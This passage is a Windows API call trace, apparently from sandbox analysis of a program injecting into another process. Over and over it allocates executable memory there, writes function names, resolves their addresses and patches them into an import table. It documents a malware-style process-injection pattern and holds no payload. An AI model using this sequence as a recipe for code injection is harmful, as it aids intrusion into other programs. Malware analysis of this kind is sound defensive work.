	[0215.410] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.411] lstrlenA (lpString="GetProcAddress") returned 14
	[0215.411] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.411] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274971c*, nSize=0xf, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274971c*, lpNumberOfBytesWritten=0x128674*=0xf) returned 1
	[0215.411] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.411] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.411] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.411] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.412] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.412] ResetEvent (hEvent=0x548) returned 1
	[0215.412] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.452] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.452] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.452] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.452] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.452] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004040, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.453] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.453] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.453] lstrlenA (lpString="HeapFree") returned 8
	[0215.453] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.453] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274972e*, nSize=0x9, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274972e*, lpNumberOfBytesWritten=0x128674*=0x9) returned 1
	[0215.454] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.454] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.454] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.454] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.455] ResetEvent (hEvent=0x548) returned 1
	[0215.455] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.455] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.455] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.455] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.455] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.455] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004044, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.456] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.456] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.456] lstrlenA (lpString="lstrlenW") returned 8
	[0215.456] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.456] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274973a*, nSize=0x9, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274973a*, lpNumberOfBytesWritten=0x128674*=0x9) returned 1
	[0215.457] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.457] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.457] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.457] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.457] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.458] ResetEvent (hEvent=0x548) returned 1
	[0215.458] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.458] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.458] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.458] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.458] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.458] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004048, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.459] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.459] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.459] lstrlenA (lpString="lstrcpynW") returned 9
	[0215.459] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.459] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749746*, nSize=0xa, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749746*, lpNumberOfBytesWritten=0x128674*=0xa) returned 1
	[0215.460] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.460] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.460] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.460] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.460] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.461] ResetEvent (hEvent=0x548) returned 1
	[0215.461] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.461] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.461] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.461] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.461] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.461] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000404c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.462] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.462] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.462] lstrlenA (lpString="MultiByteToWideChar") returned 19
	[0215.462] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.462] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749752*, nSize=0x14, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749752*, lpNumberOfBytesWritten=0x128674*=0x14) returned 1
	[0215.463] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.463] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.463] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.463] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.464] ResetEvent (hEvent=0x548) returned 1
	[0215.464] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.464] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.464] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.464] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.464] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.464] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004050, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.465] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.465] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.465] lstrlenA (lpString="HeapAlloc") returned 9
	[0215.465] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.465] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749768*, nSize=0xa, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749768*, lpNumberOfBytesWritten=0x128674*=0xa) returned 1
	[0215.466] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.466] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.466] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.466] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.467] ResetEvent (hEvent=0x548) returned 1
	[0215.467] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.467] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.467] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.467] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.467] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.467] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004054, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.468] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.468] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.468] lstrlenA (lpString="GetProcessHeap") returned 14
	[0215.468] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.468] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749774*, nSize=0xf, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749774*, lpNumberOfBytesWritten=0x128674*=0xf) returned 1
	[0215.469] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.469] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.469] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.469] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.470] ResetEvent (hEvent=0x548) returned 1
	[0215.470] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.470] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.470] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.470] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.470] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.470] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004058, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.471] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.471] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.471] lstrlenA (lpString="lstrlenA") returned 8
	[0215.471] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.471] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749786*, nSize=0x9, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749786*, lpNumberOfBytesWritten=0x128674*=0x9) returned 1
	[0215.472] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.472] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.472] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.472] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.473] ResetEvent (hEvent=0x548) returned 1
	[0215.473] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.473] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.473] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.473] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.473] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.473] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000405c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.474] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.474] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.474] lstrlenA (lpString="HeapReAlloc") returned 11
	[0215.474] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.474] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749792*, nSize=0xc, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749792*, lpNumberOfBytesWritten=0x128674*=0xc) returned 1
	[0215.475] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.475] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.475] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.475] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.475] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.476] ResetEvent (hEvent=0x548) returned 1
	[0215.476] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.476] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.476] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.476] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.476] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.476] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004060, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.477] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.477] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.477] lstrlenA (lpString="ReadFile") returned 8
	[0215.477] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.477] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27497a0*, nSize=0x9, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27497a0*, lpNumberOfBytesWritten=0x128674*=0x9) returned 1
	[0215.477] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.478] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.478] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.478] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.478] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.479] ResetEvent (hEvent=0x548) returned 1
	[0215.479] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.479] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.479] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.479] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.479] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.479] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004064, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.480] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.480] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.480] lstrlenA (lpString="SetHandleInformation") returned 20
	[0215.480] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.480] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27497ac*, nSize=0x15, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27497ac*, lpNumberOfBytesWritten=0x128674*=0x15) returned 1
	[0215.480] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.480] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.481] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.481] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.481] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.481] ResetEvent (hEvent=0x548) returned 1
	[0215.481] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
